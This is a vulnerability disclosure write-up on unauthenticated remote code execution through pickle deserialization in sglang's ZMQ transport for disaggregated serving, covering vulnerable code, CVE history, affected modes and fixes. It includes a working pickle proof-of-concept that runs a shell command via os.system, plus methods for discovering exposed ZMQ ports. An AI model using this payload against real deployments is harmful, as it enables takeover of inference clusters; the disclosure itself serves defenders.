sglang: Unauthenticated RCE via Pickle Deserialization in ZMQ Transport (Disaggregated Serving)

Introduction

This one comes with a transparency disclaimer: the vulnerability I’m reporting in sglang is already known. Multiple researchers have flagged it, and the maintainers have acknowledged it. I independently discovered the same ZMQ pickle surface during a systematic audit in February 2026. Since then, CERT/CC assigned CVE-2026-3059 and CVE-2026-3060 on March 12, 2026 - without a patch from the maintainers, which suggests sglang was equally unresponsive to CERT/CC. As of this writing, pickle.loads() is still in the codebase on the main branch.

sglang is a fast serving framework for large language models with 23,484 stars. Its ZMQ transport layer for disaggregated serving calls pickle.loads() on data received from network-bound ZMQ sockets with no authentication. This is a separate vulnerability from CVE-2025-10164, which covers only the HTTP /update_weights_from_tensor endpoint.

Target: sgl-project/sglang Stars: 23,484 Severity: Critical (CVSS 3.1: 9.8)

What is sglang?

sglang (SGLang) is one of the most popular LLM (Large Language Model) serving frameworks, known for its speed and efficiency. It supports disaggregated serving, where the prefill (prompt processing) and decode (token generation) phases run on separate GPU nodes connected via ZMQ sockets. This architecture is used in enterprise deployments - the project’s documentation describes running DeepSeek-V3 across 96 H100 GPUs.

The disaggregated serving mode creates ZMQ PULL sockets for inter-node communication. These sockets receive serialized data from remote nodes and deserialize it with pickle.loads().

The Vulnerability

The core issue is in python/sglang/srt/disaggregation/encode_receiver.py.

Line 209 - synchronous receiver:

parts = self.recv_socket.recv_multipart(flags=zmq.NOBLOCK, copy=False)
recv_obj: EmbeddingData = pickle.loads(parts[0])

Line 661 - async receiver (same pattern):

recv_obj: EmbeddingData = pickle.loads(parts[0])

The socket factory in common.py creates these sockets bound to all interfaces:

# common.py line 1444 - get_zmq_socket_on_host()
port = socket.bind_to_random_port("tcp://*")

The dynamically assigned port is then communicated to peers over plaintext HTTP (POST to {encoder_url}/scheduler_receive_url), making it discoverable via network sniffing.

There are additional pickle.loads() calls in shm_broadcast.py (lines 458, 461, 464) for shared memory broadcast communication.

Distinction from CVE-2025-10164

CVE-2025-10164 was patched in sglang v0.5.4 via PR #11909, which added a SafeUnpickler to the HTTP API endpoint /update_weights_from_tensor. That fix does NOT cover the ZMQ transport layer. The ZMQ sockets are separate code paths with separate network bindings.

Prior Art - Full Transparency

I want to be completely transparent about the history here:

Researcher Avi Lumelsky has been reporting this ZMQ pickle vulnerability since February 2025 across multiple issues (#3343, #5569, #11720). All were closed without fixing pickle.loads() - #11720 was explicitly auto-closed by the stale bot.
PR #5752 (May 2025) partially addressed the issue by restricting the ZMQ bind address from * to connect_ip, but it did NOT fix pickle.loads(). The deserialization is still unsafe.
Oligo Security’s ShadowMQ research (November 2025) publicly named sglang as having “incomplete fixes” for ZMQ pickle deserialization. Their blog post covered the vulnerability class across multiple ML frameworks.
A maintainer responded in November 2025: “Does not impact isolated clusters yet. But we will have a fix soon.” No fix has materialized.

At the time of my report in February 2026, sglang had CVE-2025-10164 for the HTTP endpoint, but nothing for the ZMQ surface. Every peer project had patched the equivalent ZMQ vulnerability. CERT/CC has since assigned CVEs on March 12, but the code remains unchanged:

Framework	CVE	Status
vLLM	CVE-2025-32444	Patched (CVSS 10.0)
TensorRT-LLM	CVE-2025-23254	Patched
Meta Llama Stack	CVE-2024-50050	Patched
Modular Max	CVE-2025-60455	Patched
sglang	CVE-2026-3059, CVE-2026-3060	CVE assigned (CERT/CC, March 12 2026) - still unfixed

sglang now has CVEs thanks to CERT/CC, but remains the only major inference framework that hasn’t actually patched the issue.

Proof of Concept

The Exploit

import zmq, pickle, os

class RCE:
    def __reduce__(self):
        return (os.system, ('id > /tmp/sglang_pwned',))

ctx = zmq.Context()
sock = ctx.socket(zmq.PUSH)
sock.connect('tcp://target:PORT')  # dynamic, from network sniff or ZMQ scan
sock.send_multipart([pickle.dumps(RCE())])

Port Discovery

The ZMQ PULL sockets use ephemeral ports assigned by bind_to_random_port(). An attacker can discover them by:

Sniffing the plaintext HTTP communication where ports are exchanged between nodes
Scanning the ephemeral port range (32768-60999) for the ZMQ 0xFF greeting byte

As part of this research, I submitted a PR to nmap adding a ZMTP service detection probe and NSE script that identifies ZMQ sockets, extracts their version, mechanism, and socket type. This makes discovering exposed ZMQ services trivial with a standard nmap -sV scan.

Note on Deployment Scope

Standard single-node deployment (python -m sglang.launch_server --model-path ...) does NOT create the vulnerable ZMQ sockets. The vulnerability is triggered only in:

PD disaggregation: --disaggregation-mode prefill or --disaggregation-mode decode
Multi-node distributed: --nnodes 2 or higher
Encoder disaggregation (multimodal): --encoder-only with --encoder-transfer-backend zmq_to_scheduler

These modes are used in enterprise and large-scale deployments.

Attack Surface

The “isolated cluster” defense from the maintainers deserves scrutiny. In practice:

Cloud GPU clusters share VPC (Virtual Private Cloud) networks. A compromised node in one tenant’s deployment can reach ZMQ ports in another.
Kubernetes clusters with flat networking (the default) allow pod-to-pod communication. A compromised pod can scan for ZMQ services.
The port exchange happens over plaintext HTTP, making it trivially interceptable.
The ZMQ 0xFF greeting byte makes port scanning fast and reliable - you don’t need to know which port to target.

The “trusted cluster” assumption is the same reasoning that led to CVE-2025-32444 in vLLM, CVE-2025-23254 in TensorRT-LLM, and CVE-2024-50050 in Meta Llama Stack. All three projects made the same argument before patching.

Suggested Fix

Replace pickle.loads() with a safe alternative. The SafeUnpickler pattern used in PR #11909 for the HTTP API could be extended to the ZMQ transport. Or better, switch to MessagePack or safetensors for tensor data.
Add ZMQ CurveZMQ authentication. This provides both encryption and authentication for ZMQ sockets.
Bind to specific interfaces instead of tcp://* by default.
Encrypt the port exchange - currently the ZMQ port numbers are sent in plaintext over HTTP.

Timeline

2025-02: Avi Lumelsky first reports ZMQ pickle issue (#3343)
2025-05: PR #5752 restricts bind address, does NOT fix pickle.loads()
2025-11: Oligo Security ShadowMQ research publicly names sglang
2025-11: Maintainer acknowledges, promises fix “soon”
2026-02-11: No fix deployed, no CVE assigned. Request submitted to VulnCheck.
2026-03-12: CERT/CC assigns CVE-2026-3059 and CVE-2026-3060 - published without a patch.
2026-03-18: pickle.loads() still present in encode_receiver.py on the main branch (lines 491, 727). Still no fix.

Takeaways

sglang is the odd one out. Every major peer has acknowledged the ZMQ pickle vulnerability, assigned a CVE, and deployed a fix. sglang has had the issue reported multiple times over the past year by multiple independent researchers and organizations - including myself, Avi Lumelsky, Oligo Security, and CERT/CC - and has not shipped a patch.

CERT/CC eventually disclosed CVE-2026-3059 and CVE-2026-3060 on March 12, 2026 without a fix, which typically means the vendor was unresponsive to them as well. As of March 18, 2026, pickle.loads() is still in the main branch. The CVEs exist now, but the code hasn’t changed.